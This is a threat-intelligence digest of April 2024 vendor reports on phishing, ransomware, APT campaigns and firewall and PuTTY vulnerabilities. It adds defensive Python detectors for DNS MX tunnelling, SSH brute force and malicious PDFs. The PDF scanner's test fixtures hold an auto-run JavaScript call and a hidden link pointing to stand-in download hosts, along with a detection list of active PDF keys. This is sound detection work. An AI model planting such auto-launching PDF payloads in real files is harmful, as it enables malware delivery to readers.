—
- Intel Source:
- ASEC
- Intel Name:
- Surge_in_Phishing_Attacks_Impersonating_Korean_Websites
- Date of Scan:
- 2024-04-22
- Impact:
- MEDIUM
- Summary:
- AhnLab’s Security Intelligence Center (ASEC) has identified a significant rise in phishing attempts mimicking Korean portal websites, logistics brands, and webmail login pages. These attacks utilize sophisticated tactics, such as replicating the appearance of legitimate websites and leveraging NoCodeForm for credential exfiltration.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- A_Malicious_PDF_File_Used_to_Deliver_Malware
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- Researchers at SANS note that billions of PDF files are shared every day and that many users trust them because they believe a PDF is “read-only” and contains just “a bunch of data”. Historically, PDF viewers, Acrobat and Foxit Reader included, have each been hit at least once by serious vulnerabilities triggered by malformed PDF files. A PDF can also be quite “dynamic”: it may carry embedded JavaScript, auto-open actions that launch scripts (such as PowerShell on Windows), or any other kind of embedded data.
Source:
https://isc.sans.edu/diary/Malicious+PDF+File+Used+As+Delivery+Mechanism/30848/
—
- Intel Source:
- Microsoft
- Intel Name:
- Microsoft_Defender_Exposes_Kubernetes_Vulnerabilities
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- Microsoft Defender recently identified a significant attack targeting Kubernetes workloads leveraging critical vulnerabilities in OpenMetadata for cryptomining. Exploiting flaws disclosed on March 15, 2024, attackers gained access to Kubernetes clusters, executed reconnaissance commands, and deployed cryptomining malware. Microsoft recommends updating OpenMetadata to version 1.3.1 or later, provides guidance for vulnerability checks, and highlights the role of Defender for Cloud in detecting and mitigating such threats, underlining the importance of proactive security measures in containerized environments.
—
- Intel Source:
- Securelist
- Intel Name:
- The_APT_group_ToddyCat_compromises_infrastructure
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- This month, Securelist researchers investigated how the attackers maintain persistent access to compromised infrastructure, what information on the hosts they are interested in, and which tools they use to collect it. ToddyCat is a threat group that mainly targets governmental organizations in the Asia-Pacific region; its main goal is to steal sensitive information from hosts.
Source:
https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Sandworm_Groups_Cyber_Scheme
- Date of Scan:
- 2024-04-22
- Impact:
- LOW
- Summary:
- CERT-UA found that in March 2024 the Sandworm group planned to disrupt the information and communication systems of almost 20 energy, water and heat supply facilities in several regions of Ukraine. CERT-UA also established that three supply chains had been compromised, either through vulnerable software or because supplier employees had access to the targets’ systems.
—
- Intel Source:
- Ars Technica
- Intel Name:
- Phishing_campaign_attacks_LastPass_users
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- The article discusses a recent phishing attack that targeted users of the password manager LastPass. The attack utilized a sophisticated phishing-as-a-service kit called CryptoChameleon, which provided all the resources needed to deceive even knowledgeable individuals into revealing their master passwords. The attackers used a combination of email, SMS, and voice calls to trick victims into giving up their login credentials. LastPass was just one of many sensitive services targeted by CryptoChameleon, and the attack was able to bypass multi-factor authentication. The article also mentions previous attacks on LastPass and offers tips for preventing these types of scams from succeeding.
—
- Intel Source:
- SOC Radar
- Intel Name:
- Security_Risks_in_OpenMetadata
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Researchers from Microsoft discovered critical vulnerabilities in the OpenMetadata platform, an open-source system designed to manage metadata across various data sources. These vulnerabilities affect OpenMetadata versions earlier than 1.3.1 and potentially allow attackers to bypass authentication and achieve remote code execution (RCE).
Source:
https://socradar.io/openmetadata-attackers-cryptomine-in-kubernetes/
—
- Intel Source:
- Avast
- Intel Name:
- Technical_Analysis_of_Lazarus_Groups_Sophisticated_Attack_Chain_Targeting_Asian_Individuals
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Avast’s investigation uncovers a sophisticated campaign by the Lazarus group targeting individuals in Asia with fabricated job offers. The attack, employing fileless malware and multi-layered loaders, showcases advanced evasion techniques and intricate C&C communication. The involvement of the Kaolin RAT highlights the group’s commitment to control and data extraction.
—
- Intel Source:
- Picus Security
- Intel Name:
- Threat_Landscape_Update_Exploits_and_Breaches
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- The Red Report 2024 by Picus Security covers critical vulnerabilities exploited by threat actors, such as the PAN-OS command injection and the PuTTY SSH client vulnerability, alongside targeted attacks by groups such as IntelBroker and Sandworm.
—
- Intel Source:
- Stairwell
- Intel Name:
- The_CVE_2024_31497_PuTTY_vulnerability
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- In the Stairwell blog, the analysts discuss CVE-2024-31497, a vulnerability in the PuTTY SSH libraries found by researchers at Ruhr University Bochum that allows attackers to recover private keys used for key-based authentication. The post provides a list of potentially vulnerable software, known vulnerable hashes and a YARA rule for detection, and stresses the importance of quickly addressing supply chain vulnerabilities. It explains the background of the vulnerability and lists potentially vulnerable software not mentioned in the NIST advisory.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Malicious_Attack_Targeting_Defense_Forces_of_Ukraine
- Date of Scan:
- 2024-04-19
- Impact:
- MEDIUM
- Summary:
- The Government Computer Emergency Response Team of Ukraine (CERT-UA) has issued an urgent alert regarding a targeted cyber attack on a computer within the Defense Forces of Ukraine. The attack involves the distribution of a malicious file named “Support.rar” via the Signal messenger, purportedly under the guise of document submission for UN Peace Support Operations. This file contains an exploit for a WinRAR software vulnerability (CVE-2023-38831). Upon successful exploitation, a CMD file is executed, initiating PowerShell scripts associated with the COOKBOX malware.
—
- Intel Source:
- Seqrite
- Intel Name:
- Unveiling_Ghost_Locker_2
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- Seqrite researchers have discovered the two versions of the Ghost Locker ransomware during their threat hunting activities. The initial variant, coded in Python, secures its presence by replicating itself in the Windows Startup directory and utilizes AES encryption to lock files. This variant communicates with a C2 server to dispatch ransom demands and extract data. The subsequent variant, mostly developed in Golang, mirrors the characteristics of the first iteration but distinguishes itself in terms of C2 server interactions and operational procedures. Moreover, it incorporates mechanisms to evade detection and carefully chooses files for encryption and data extraction.
—
- Intel Source:
- NSFOCUS
- Intel Name:
- Palo_Alto_Networks_Fixes_Critical_Command_Injection_Vulnerability_in_PAN_OS_Firewall
- Date of Scan:
- 2024-04-19
- Impact:
- LOW
- Summary:
- NSFOCUS CERT has detected a critical command injection vulnerability (CVE-2024-3400) in Palo Alto Networks’ PAN-OS firewall operating system. Unauthenticated attackers could exploit this flaw to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks has released security updates addressing this vulnerability, with the PoC already public and actively exploited. The CVSS score of 10.0 underscores the severity of the issue. Users are urged to upgrade to patched versions immediately.
Source:
https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/
—
- Intel Source:
- The Hacker News
- Intel Name:
- Malvertising_Campaign_Leveraging_Google_Ads_Distributes_MadMxShell_Backdoor
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Zscaler ThreatLabz researchers have uncovered a sophisticated malvertising campaign utilizing Google Ads to distribute a previously unknown backdoor named MadMxShell. The campaign involves the registration of multiple domains resembling legitimate IP scanner software, which are then promoted through Google Ads to target specific search keywords. Victims who visit these sites are tricked into downloading a malicious file disguised as IP scanner software. Once executed, the malware employs DLL side-loading and process hollowing techniques to infect systems, ultimately establishing a backdoor for gathering system information and performing malicious activities.
Source:
https://thehackernews.com/2024/04/malicious-google-ads-pushing-fake-ip.html
—
- Intel Source:
- Securelist
- Intel Name:
- Unveiling_the_DuneQuixote_Malware_Campaign
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- Researchers at Securelist have discovered a new malware campaign named “DuneQuixote,” specifically aimed at government organizations within the Middle East. This campaign comprises more than 30 dropper samples, each carrying a backdoor labeled “CR4T.” The primary objective of this malware is to secretly infiltrate and manage compromised systems.
—
- Intel Source:
- CISA
- Intel Name:
- A_wide_range_of_Akira_ransomware
- Date of Scan:
- 2024-04-18
- Impact:
- HIGH
- Summary:
- According to a joint advisory from the FBI, CISA, Europol’s European Cybercrime Centre (EC3), and the Netherlands’ National Cyber Security Centre (NCSC-NL), the Akira ransomware operation has breached the networks of over 250 organizations and raked in roughly $42 million in ransom payments. Since March 2023, Akira ransomware has impacted a wide range of businesses and critical infrastructure entities in North America, Europe, and Australia. In April 2023, following an initial focus on Windows systems, Akira threat actors deployed a Linux variant targeting VMware ESXi virtual machines.
Source:
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a
—
- Intel Source:
- Cisco Talos
- Intel Name:
- The_upload_of_confidential_documents_to_VirusTotal_by_OfflRouter_virus
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Cisco Talos recently discovered documents containing sensitive information from Ukraine that carried malicious VBA code, indicating they could be used as lures to infect organizations. The virus, OfflRouter, has been known in Ukraine since 2015 and is still active on some Ukrainian organizations’ networks, judging by more than 100 original infected documents uploaded to VirusTotal from Ukraine and their upload dates.
—
- Intel Source:
- Trend Micro
- Intel Name:
- UK_Law_Enforcement_Successfully_Takes_Down_Phishing_as_a_Service_Provider_LabHost
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- UK’s Metropolitan Police Service, in collaboration with international law enforcement agencies and private industry partners, executed an operation leading to the takedown of the notorious Phishing-as-a-Service (PhaaS) provider LabHost. LabHost, also known as LabRat, had gained notoriety since its emergence in late 2021 for offering a platform facilitating phishing attacks against numerous banks and organizations worldwide. With over 2,000 criminal users and more than 40,000 fraudulent sites deployed, LabHost posed a significant threat to global cybersecurity.
Source:
https://www.trendmicro.com/en_us/research/24/d/labhost-takedown.html
—
- Intel Source:
- McAfee
- Intel Name:
- A_new_packed_variant_of_the_Redline_Stealer_trojan
- Date of Scan:
- 2024-04-18
- Impact:
- MEDIUM
- Summary:
- Recently, McAfee telemetry data showed the details of a new variant of the Redline Stealer trojan that uses Lua bytecode to perform malicious activities. It is prevalent in various regions and is distributed through GitHub. The trojan creates persistence on infected machines and communicates through HTTP, while also being able to take screenshots and steal data. McAfee also covered the analysis of the bytecode file and the techniques used by the threat actors, including creating a mutex and retrieving information from the Windows registry.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/redline-stealer-a-novel-approach/
—
- Intel Source:
- ASEC
- Intel Name:
- Analysis_of_Pupy_RAT
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- ASEC researchers report that numerous threat actors are using Pupy RAT, an open-source remote access trojan, to control compromised hosts remotely, steal data and escalate privileges on the system. It no longer targets only Windows: it is now also being used against Linux systems, notably in South Korea.
—
- Intel Source:
- Zscaler
- Intel Name:
- The_newly_discovered_backdoor_MadMxShell
- Date of Scan:
- 2024-04-18
- Impact:
- LOW
- Summary:
- Zscaler provided the details of a new backdoor, MadMxShell, discovered by ThreatLabz. The backdoor is delivered through a ZIP archive and uses obfuscated shellcodes to extract and decode an executable file. It also has a dropper stage and a final backdoor stage for collecting system information and executing commands. The backdoor communicates with its C2 server through DNS MX queries and responses, using a custom method to encode data.
Source:
https://www.zscaler.com/blogs/security-research/malvertising-campaign-targeting-it-teams-madmxshell
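MadMxShell’s C2 channel rides on DNS MX queries and responses with data encoded into the queried names. Without knowing the custom encoding, the observable that stands out on a resolver is the shape of the traffic: one host issuing many MX queries for distinct, high-entropy subdomains under a single domain, which ordinary clients never do (a mail server looks up the MX record of a bare recipient domain, once per domain). The following Python detector is an added example written for this digest, not Zscaler’s code. The resolver log format, the client addresses, the domain `c2-example.invalid` and the hex labels are all constructed for the demonstration, and the “registered domain” is approximated as the last two labels rather than resolved against a public suffix list.

```python
import math
from collections import defaultdict

# Constructed resolver log (not real traffic): "<timestamp> <client> <qtype> <qname>".
DNS_LOG = """\
2024-04-17T10:00:01Z 10.0.0.5 A www.example.com
2024-04-17T10:00:02Z 10.0.0.5 MX 6a5f3c9d2e1b4a7f.c2-example.invalid
2024-04-17T10:00:03Z 10.0.0.9 MX example.net
2024-04-17T10:00:04Z 10.0.0.5 MX c0ffee1234567890.c2-example.invalid
2024-04-17T10:00:05Z 10.0.0.9 MX example.org
2024-04-17T10:00:06Z 10.0.0.5 MX 8b2d9e4f1a7c3560.c2-example.invalid
2024-04-17T10:00:07Z 10.0.0.5 MX d41d8cd98f00b204.c2-example.invalid
2024-04-17T10:00:08Z 10.0.0.9 MX mail.corp.example.com
2024-04-17T10:00:09Z 10.0.0.5 MX e9107c6a3b58f24d.c2-example.invalid
2024-04-17T10:00:10Z 10.0.0.5 MX 5f1e2d3c4b5a6978.c2-example.invalid
2024-04-17T10:00:11Z 10.0.0.5 A update.example.com
"""


def shannon_entropy(s: str) -> float:
    """Bits per character: random hex approaches 4.0, dictionary words sit around 2-3."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname: str):
    """Return (subdomain, registered_domain); last-two-labels approximation, no PSL."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def detect_mx_tunnel(log: str, min_queries=5, min_entropy=3.0, min_distinct_ratio=0.8):
    """Flag (client, domain) pairs whose MX queries look like encoded data in labels."""
    subdomains = defaultdict(list)
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[2] != "MX":
            continue
        sub, domain = split_qname(parts[3])
        if not sub:
            continue  # bare-domain MX lookups are normal mail-server behaviour
        subdomains[(parts[1], domain)].append(sub)

    alerts = []
    for (client, domain), subs in subdomains.items():
        distinct = set(subs)
        avg_entropy = sum(shannon_entropy(s.replace(".", "")) for s in distinct) / len(distinct)
        # Many queries, almost all for different names, and names that look random:
        # that is data leaving (or commands arriving) through the label space.
        if (len(subs) >= min_queries
                and len(distinct) / len(subs) >= min_distinct_ratio
                and avg_entropy >= min_entropy):
            alerts.append({
                "client": client,
                "domain": domain,
                "queries": len(subs),
                "distinct_subdomains": len(distinct),
                "avg_entropy": round(avg_entropy, 2),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_mx_tunnel(DNS_LOG):
        print(alert)
```

The thresholds are deliberately conservative; on a real resolver you would baseline per-client MX volume first, because an outbound mail relay legitimately makes thousands of MX queries, but each for a bare domain with a low-entropy name, which is exactly what the `sub` check and the entropy gate are there to separate.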
—
- Intel Source:
- Fortinet
- Intel Name:
- Botnets_Continue_Exploiting_CVE_2023_1389
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers examined patterns of infection traffic and provide insight into botnets that exploited CVE-2023-1389 last year and are believed to be exploiting it widely this month. The command injection vulnerability in the web management interface of the TP-Link Archer AX21 (AX1800) was disclosed, and a fix released, a year ago. Recently, researchers have observed multiple attacks focusing on this year-old vulnerability from botnets such as Moobot, Miori, the Golang-based agent “AGoent” and a Gafgyt variant.
—
- Intel Source:
- Forescout
- Intel Name:
- A_Recent_Wild_Exploit_Campaign_Targets_Media_Company
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- Forescout’s Vedere Labs describes an exploitation campaign targeting organizations running Fortinet FortiClient EMS instances vulnerable to CVE-2023-48788.
Source:
https://www.forescout.com/blog/connectfun-new-exploit-campaign-in-the-wild-targets-media-company/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Cyber_Threats_Targeting_Ukraine_Defense_Forces
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- CERT-UA reports that the group UAC-0184 has become more active in 2024. The group aims to steal documents and messenger chat data from computers used by Ukraine’s Defense Forces, often delivering malware through popular messaging apps with lures about legal issues or war videos.
—
- Intel Source:
- Blackberry
- Intel Name:
- Threat_actors_FIN7_attack_the_US_Automotive
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Blackberry’s analysts shared the examined details about the threat of phishing attacks on businesses and provided recommendations for protecting against them. It includes a case study of a recent attack by the threat group FIN7 on a U.S. automotive company. The article suggests implementing various security measures, such as employee training, multi-factor authentication, and incident response plans, to prevent and mitigate the impact of phishing attacks. It also provides a detailed analysis of the tactics and techniques used by FIN7 in their attack, as well as a list of indicators of compromise.
Source:
https://blogs.blackberry.com/en/2024/04/fin7-targets-the-united-states-automotive-industry
—
- Intel Source:
- Cado Security
- Intel Name:
- Critical_Atlassian_Flaw_Exploited_to_Deploy_Linux_Variant_of_Cerber_Ransomware
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Cado Security have observed threat actors using unpatched Atlassian servers to distribute the Linux version of the Cerber ransomware, also known as C3RB3R. The attacks exploit a critical security flaw in Atlassian Confluence Data Center and Server, CVE-2023-22518 (CVSS score: 9.1), which allows an unauthenticated attacker to reset Confluence and create an administrator account.
Source:
https://www.cadosecurity.com/blog/cerber-ransomware-dissecting-the-three-heads
—
- Intel Source:
- Netskope
- Intel Name:
- Evil_Ant_Ransomware
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- Netskope researchers shared an analysis of a new ransomware strain called Evil Ant. It targets personal folders and external drives for encryption and requires administrator privileges to function properly. It also disables Windows Defender and Task Manager, collects the victim’s IP address, and encrypts files using Fernet symmetric encryption.
Source:
https://www.netskope.com/jp/blog/netskope-threat-coverage-evil-ant-ransomware
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Brute_Force_Attacks_Targeting_VPN_and_SSH_Services
- Date of Scan:
- 2024-04-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Cisco Talos recently warned of a global increase in brute-force attacks which, since at least March 18, 2024, have been targeting a variety of devices, including web application authentication interfaces, virtual private network (VPN) services and SSH services. All of these attacks appear to originate from TOR exit nodes and other anonymizing tunnels and proxies.
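The Talos advisory above is about volumetric credential guessing against SSH and VPN login interfaces from Tor exit nodes and proxies. The detection logic is the same whether the log source is sshd or a VPN gateway: count failures per source address inside a time window, look at how many distinct usernames were tried, and check whether a success follows the burst. The following Python detector is an added example written for this digest, not Talos code. The sshd-style log lines, the year assumed for the syslog timestamps, the thresholds and the anonymizer address list are all constructed for the demonstration; in production the anonymizer set would come from a Tor exit list or proxy feed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log excerpt (TEST-NET addresses, invented hostnames and PIDs).
AUTH_LOG = """\
Mar 18 09:00:00 vpn1 sshd[2100]: Failed password for root from 198.51.100.99 port 60001 ssh2
Mar 18 09:30:00 vpn1 sshd[2120]: Failed password for root from 198.51.100.99 port 60002 ssh2
Mar 18 10:00:00 vpn1 sshd[2140]: Failed password for root from 198.51.100.99 port 60003 ssh2
Mar 18 10:01:02 vpn1 sshd[2211]: Failed password for invalid user admin from 198.51.100.23 port 51122 ssh2
Mar 18 10:01:04 vpn1 sshd[2213]: Failed password for root from 198.51.100.23 port 51130 ssh2
Mar 18 10:01:07 vpn1 sshd[2215]: Failed password for invalid user test from 198.51.100.23 port 51141 ssh2
Mar 18 10:01:09 vpn1 sshd[2217]: Failed password for invalid user vpn from 198.51.100.23 port 51150 ssh2
Mar 18 10:01:12 vpn1 sshd[2219]: Failed password for invalid user user from 198.51.100.23 port 51162 ssh2
Mar 18 10:01:15 vpn1 sshd[2221]: Failed password for root from 198.51.100.23 port 51170 ssh2
Mar 18 10:02:40 vpn1 sshd[2240]: Accepted password for root from 198.51.100.23 port 51201 ssh2
Mar 18 10:05:00 vpn1 sshd[2260]: Failed password for alice from 203.0.113.7 port 40001 ssh2
Mar 18 10:05:20 vpn1 sshd[2262]: Accepted password for alice from 203.0.113.7 port 40002 ssh2
Mar 18 10:30:00 vpn1 sshd[2160]: Failed password for root from 198.51.100.99 port 60004 ssh2
Mar 18 11:00:00 vpn1 sshd[2180]: Failed password for root from 198.51.100.99 port 60005 ssh2
"""

# Constructed stand-in for a Tor exit node / open proxy feed.
ANONYMIZER_IPS = frozenset({"198.51.100.23"})

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)
LOG_YEAR = 2024  # syslog timestamps carry no year; assumed for the sample


def parse_auth_log(text):
    """Return a list of (timestamp, result, user, ip) for each password-auth line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{LOG_YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=10), anonymizers=frozenset()):
    """Flag source IPs with at least `threshold` failures inside any span of `window`."""
    by_ip = defaultdict(list)
    for ts, result, user, ip in parse_auth_log(text):
        by_ip[ip].append((ts, result, user))

    alerts = []
    for ip, events in by_ip.items():
        events.sort()
        fails = [(ts, user) for ts, result, user in events if result == "Failed"]
        # Sliding window over the sorted failure times gives the peak burst size,
        # so five failures spread over two hours do not count as a burst.
        peak, j = 0, 0
        for i in range(len(fails)):
            while fails[i][0] - fails[j][0] > window:
                j += 1
            peak = max(peak, i - j + 1)
        if peak < threshold:
            continue
        alerts.append({
            "ip": ip,
            "failures": len(fails),
            "peak_in_window": peak,
            "users": sorted({user for _, user in fails}),
            # A success after a burst is the case that needs a human now.
            "followed_by_success": any(r == "Accepted" for _ts, r, _u in events),
            "anonymizer": ip in anonymizers,
        })
    return sorted(alerts, key=lambda a: a["failures"], reverse=True)


if __name__ == "__main__":
    for alert in detect_bruteforce(AUTH_LOG, anonymizers=ANONYMIZER_IPS):
        print(alert)
```

Run against the sample, the detector reports only 198.51.100.23: six failures in thirteen seconds across five usernames, coming from an address on the anonymizer list and followed by a successful login, which is the sequence that should trigger a password reset and session review rather than just a block. The slow guesser at 198.51.100.99 stays below the burst threshold with the default ten-minute window; widening the window to a few hours surfaces it too.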
—
- Intel Source:
- ISC.SANS
- Intel Name:
- The_Peril_of_Malicious_Annotations
- Date of Scan:
- 2024-04-17
- Impact:
- LOW
- Summary:
- ISC.SANS researchers show that PDF files, long considered “read-only” and benign, remain a potent vector for malware delivery. Despite improvements in PDF viewer security, attackers exploit features such as annotations and clickable links to lure users into downloading malware. The analysis delves into the PDF file structure, demonstrating how attackers embed clickable zones using “/Annot” objects that link to external URLs. The provided YARA rule offers a means to detect such malicious PDF documents.
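The two ISC diary entries in this digest (the malicious PDF delivery mechanism above and this one on annotations) come down to the same triage step: look for the keys that make a PDF “dynamic” and pull out the link targets. The following Python scanner is an added example written for this digest, not code from ISC or SANS, and it does not reproduce their YARA rule. The two PDF skeletons are constructed inline (the object layout, the `example.invalid` URLs and the script body are invented for the test). The scanner resolves `#xx` hex escapes in names so that `/#55RI` is recognized as `/URI`, counts `/Annot` objects, and extracts `/URI` and `/JS` literal strings while honouring nested parentheses. It does not inflate `/FlateDecode` streams or walk object streams; a real triage tool would decompress those first.

```python
import re

# Constructed sample files (not real malware): minimal PDF skeletons that carry the
# structures the scanner looks for; they are not meant to render in a viewer.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# A full-page, borderless /Link annotation pointing at an external URL, plus an
# /OpenAction that runs embedded JavaScript as soon as the document is opened.
LINK_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792] /Border [0 0 0]
   /A << /S /URI /URI (http://example.invalid/update.exe) >> >> endobj
5 0 obj << /S /JavaScript /JS (app.launchURL('http://example.invalid/x', true)) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Same file with the /URI name hex-escaped as /#55RI: the PDF spec treats both
# spellings as the same name, but a naive substring match misses the second.
OBFUSCATED_PDF = LINK_PDF.replace(b"/URI (", b"/#55RI (")

# Keys that make a PDF "active" rather than static data.
ACTIVE_KEYS = (b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx hex escapes inside PDF names so /#55RI becomes /URI."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def literal_string(data: bytes, start: int) -> bytes:
    """Return the PDF literal string whose opening '(' is at data[start].

    Honours balanced nested parentheses and backslash escapes, which a plain
    non-greedy regex gets wrong for strings such as (f(x)).
    """
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                 # escaped character: keep it, drop the backslash
            out += data[i + 1:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
            if depth > 1:
                out += c
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out)
            out += c
        else:
            out += c
        i += 1
    return bytes(out)                  # unterminated string: return what was read


def scan_pdf(data: bytes) -> dict:
    """Collect active keys, the /Annot object count, and link/script targets."""
    data = normalize_names(data)
    found = {
        "active_keys": [k.decode() for k in ACTIVE_KEYS if k in data],
        "annots": len(re.findall(rb"/Type\s*/Annot\b", data)),
        "uris": [],
        "scripts": [],
    }
    for m in re.finditer(rb"/URI\s*\(", data):
        found["uris"].append(literal_string(data, m.end() - 1).decode("latin-1"))
    for m in re.finditer(rb"/JS\s*\(", data):
        found["scripts"].append(literal_string(data, m.end() - 1).decode("latin-1"))
    return found


def verdict(data: bytes) -> str:
    """'suspicious' when the file carries any active key or an external link target."""
    found = scan_pdf(data)
    return "suspicious" if found["active_keys"] or found["uris"] else "clean"


if __name__ == "__main__":
    for name, pdf in (("benign", BENIGN_PDF), ("link", LINK_PDF), ("obfuscated", OBFUSCATED_PDF)):
        print(name, verdict(pdf), scan_pdf(pdf))
```

A `/Link` annotation is a legitimate feature, so the count alone is not a verdict; what matters in triage is a full-page, borderless rectangle whose `/URI` points at an executable or a URL shortener, or a `/URI` name that had to be hex-escaped to get past string matching.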
—
- Intel Source:
- Blackberry
- Intel Name:
- LightSpy_campaign_returns
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Blackberry researchers shared details of the LightSpy campaign, a mobile espionage operation targeting individuals in Southern Asia, potentially with state-sponsored involvement. The report covers the technical details of the malware, its Chinese origins and the advanced techniques used, and offers recommendations for individuals and organizations to protect themselves. It discusses the campaign’s return with expanded capabilities and the threat actor group behind it, and emphasizes the need for increased vigilance and robust security measures in the targeted region.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Decoding_TA427
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Proofpoint researchers profile TA427, a highly active North Korea-aligned group that impersonates experts in fields such as education, journalism and research in order to engage other experts, gain a foothold in their organizations and gather intelligence. TA427 has been quite successful at this and shows no sign of stopping; it changes its methods quickly and creates new personas when needed.
—
- Intel Source:
- Positive Technologies
- Intel Name:
- TA558_Worldwide_Attacks
- Date of Scan:
- 2024-04-16
- Impact:
- MEDIUM
- Summary:
- Researchers at Positive Technologies have discovered a group called TA558 has carried out over 300 attacks worldwide. They are using an old vulnerability called CVE-2017-11882 to spread malware through a campaign called SteganoAmor. This campaign is affecting users in Latin America and other parts of the world. TA558 hides malware within its attacks using a technique called steganography.
—
- Intel Source:
- Palo Alto Networks
- Intel Name:
- Campaign_For_Contact_Forms_Distributes_SSLoad_Malware
- Date of Scan:
- 2024-04-16
- Impact:
- LOW
- Summary:
- Researchers at Palo Alto Networks observed a campaign that abuses website contact forms to lure victims into fetching an MSI file from a WebDAV server; at the time of analysis that WebDAV server had stopped operating. The same campaign has been spreading Latrodectus malware in recent weeks, but the MSI in this particular infection chain is not Latrodectus: it delivers SSLoad.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_spread_of_infostealers_by_a_Russian_cybercriminal_campaign
- Date of Scan:
- 2024-04-15
- Impact:
- LOW
- Summary:
- The Insikt Group has uncovered a large-scale Russian-language cybercrime operation that leverages fake Web3 gaming projects to distribute infostealer malware targeting both macOS and Windows users.
—
- Intel Source:
- Palo Alto, Volexity
- Intel Name:
- Zero_Day_Exploitation_of_Unauthenticated_RCE_Vulnerability_in_GlobalProtect
- Date of Scan:
- 2024-04-15
- Impact:
- HIGH
- Summary:
- Palo Alto Networks’ Unit 42 and Volexity have identified zero-day exploitation of a vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS. The critical command injection vulnerability enables an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The vulnerability, assigned CVE-2024-3400, has a CVSS score of 10.0.
Source:
https://unit42.paloaltonetworks.com/cve-2024-3400/#post-133365-_ydqdbjg0dngh
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
—
- Intel Source:
- Bitdefender
- Intel Name:
- Malvertising_campaigns_hijack_social_media_to_spread_stealers
- Date of Scan:
- 2024-04-15
- Impact:
- LOW
- Summary:
- Threat actors have been copying AI software such as Midjourney, Sora AI, DALL-E 3, Evoto, and ChatGPT 5 on Facebook to trick users into downloading purported official desktop versions of these AI software. The malicious webpages then download intrusive stealers such as Rilide, Vidar, IceRAT, and Nova Stealer.
—
- Intel Source:
- Esentire
- Intel Name:
- The_XWorm_Tax_Scam
- Date of Scan:
- 2024-04-12
- Impact:
- LOW
- Summary:
